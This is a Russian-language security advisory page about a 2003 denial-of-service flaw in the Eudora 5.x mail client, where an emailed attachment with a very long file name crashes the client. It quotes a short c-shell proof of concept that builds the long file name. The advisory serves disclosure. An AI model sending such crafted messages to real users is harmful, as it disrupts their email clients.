DoS против Eudora

Дата публикации:
10.03.2003
Всего просмотров:
707
Опасность:
Низкая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Отказ в обслуживании
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Eudora 5.x
Описание: Уязвимость отказа в обслуживании обнаружена в почтовом клиенте Eudora. Удаленный пользователь может послать почтовое сообщение, которое приведет к аварийному завершению работы клиента.

SecuriTeam сообщил, что удаленный пользователь может послать e-mail сообщение с файлом, который имеет длинное имя, целевому пользователю, чтобы аварийно завершить работу программы. Пример:

Create a text file with a long name using:
$ set a=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAA
and
$ echo "security" >! $a.txt
(Written in c-shell)
Уязвимость обнаружена в Eudora Versions 5.1.*
или введите имя

CAPTCHA